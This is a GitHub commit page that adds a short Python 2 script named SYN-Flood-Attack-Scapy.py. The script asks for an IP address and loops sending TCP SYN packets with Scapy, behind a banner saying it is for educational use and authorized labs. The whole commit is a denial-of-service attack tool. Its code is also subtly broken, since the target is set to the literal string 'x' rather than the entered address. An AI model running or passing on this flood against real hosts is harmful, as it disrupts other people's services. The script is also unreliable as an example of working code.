Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

Commit 96f9ac2

Browse files
Create SYN-Flood-Attack-Scapy.py
1 parent dfc76f5 commit 96f9ac2

File tree

1 file changed

+20
-0
lines changed

1 file changed

+20
-0
lines changed
Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
#!/bin/env python
2+
import sys
3+
import os
4+
5+
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
6+
print "Use this script for educational purpose only and proof-of-concepts"
7+
print " Make your own test lab or try where authorized to do so "
8+
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
9+
10+
11+
x = raw_input("Enter the IP address: ")
12+
13+
from scapy.all import *
14+
seq = 0
15+
for a in range(0, 1000):
16+
seq = seq + a
17+
sr(IP(dst="x")/TCP(flags = "S", seq = seq))
18+
#a.show()
19+
#sr(a)
20+
######## END OF CODE #########

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /